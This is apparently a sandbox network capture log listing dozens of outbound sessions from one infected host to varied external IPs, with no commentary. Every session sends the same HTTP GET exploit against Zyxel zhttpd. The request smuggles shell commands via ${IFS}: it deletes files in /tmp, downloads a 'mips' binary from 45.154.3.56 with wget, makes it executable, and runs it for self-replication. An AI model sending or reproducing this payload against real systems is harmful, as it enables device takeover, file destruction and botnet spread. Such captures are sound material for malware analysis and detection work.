                        Mar 12, 2024 08:50:23.006006956 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        186192.168.2.143587259.80.135.127443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.006135941 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        187192.168.2.145178061.174.116.16443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.006283045 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        188192.168.2.144407679.26.172.238443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.006407976 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        189192.168.2.1438252210.17.38.28443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.006563902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        190192.168.2.144506062.78.189.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.006593943 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        191192.168.2.1437304150.28.135.101443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.006690979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        192192.168.2.144191248.82.84.104443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.006777048 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        193192.168.2.1450428178.149.24.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.006908894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        194192.168.2.144985449.145.45.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.006999969 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        195192.168.2.1441226104.237.195.241443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.007114887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        196192.168.2.145196459.232.81.67443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.007169962 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        197192.168.2.146004449.196.126.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.007333994 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        198192.168.2.1456410124.244.211.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.007388115 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        199192.168.2.1445632125.210.38.208443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.007486105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        200192.168.2.1437342197.179.21.253443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.007596970 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        201192.168.2.1456540195.16.78.28443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.007694960 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        202192.168.2.1442970177.126.122.134443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.007844925 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        203192.168.2.145304894.111.68.130443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.007972002 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        204192.168.2.14348905.214.218.201443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.008083105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        205192.168.2.1447762141.211.207.224443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.008177996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        206192.168.2.1459814199.106.226.188443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.008527040 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        207192.168.2.146035095.174.24.17443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.008600950 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        208192.168.2.1452404144.127.71.224443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.008670092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        209192.168.2.145324062.237.134.162443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.008757114 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        210192.168.2.1434700170.209.132.11443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.008785963 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        211192.168.2.145425627.60.249.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.008894920 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        212192.168.2.14334084.69.206.108443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.008987904 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        213192.168.2.1442502185.49.103.210443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.009044886 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        214192.168.2.1443096128.232.115.143443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.009176016 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        215192.168.2.144338692.254.94.134443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.009207010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        216192.168.2.145406459.7.55.150443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.009264946 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        217192.168.2.143773225.81.150.76443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.009351969 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        218192.168.2.144658438.148.226.98443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.009403944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        219192.168.2.1434916119.168.1.29443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.009493113 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        220192.168.2.1434726144.1.28.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.009569883 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        221192.168.2.145243097.7.12.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.009646893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        222192.168.2.1456268190.70.72.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.009742975 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        223192.168.2.144477462.82.204.50443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.009799004 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        224192.168.2.1436596103.119.19.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.009851933 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        225192.168.2.14414728.221.110.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.009968996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        226192.168.2.1433406174.1.158.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.010040045 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        227192.168.2.1436726149.179.154.105443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.010129929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        228192.168.2.144872052.239.90.192443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.010206938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        229192.168.2.144113697.58.172.128443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.010270119 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        230192.168.2.1458940160.91.147.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.010423899 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        231192.168.2.1446232144.77.48.44443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.010447979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        232192.168.2.1439890151.165.88.99443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.010555029 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        233192.168.2.144854496.89.4.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.010646105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        234192.168.2.1459502220.237.75.228443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.010711908 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        235192.168.2.1458614209.243.82.104443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.010776043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        236192.168.2.1441196157.169.39.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.010847092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        237192.168.2.1434334132.62.142.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.010946989 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        238192.168.2.143783450.84.86.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.011030912 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        239192.168.2.145854081.69.17.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.011095047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        240192.168.2.144188845.64.66.140443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.011147976 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        241192.168.2.1435478145.45.221.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.011260986 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        242192.168.2.144449680.29.14.248443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.011346102 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        243192.168.2.1439106146.56.247.115443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.011409998 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        244192.168.2.1454500128.104.36.48443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.011470079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        245192.168.2.1459440120.102.73.180443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.011547089 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        246192.168.2.1452980121.173.251.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.011637926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        247192.168.2.1435264106.178.20.197443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.011662960 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        248192.168.2.1455718197.167.103.198443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.011785030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        249192.168.2.1444502171.136.223.43443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.011854887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        250192.168.2.144034664.69.99.157443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.011940002 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        251192.168.2.1434210189.31.178.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.012048006 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        252192.168.2.1434762172.77.245.150443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.012099028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        253192.168.2.146055045.131.102.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.012181044 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        254192.168.2.144075436.28.37.169443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.016810894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        255192.168.2.1438148148.170.220.97443
                        TimestampBytes transferredDirectionData
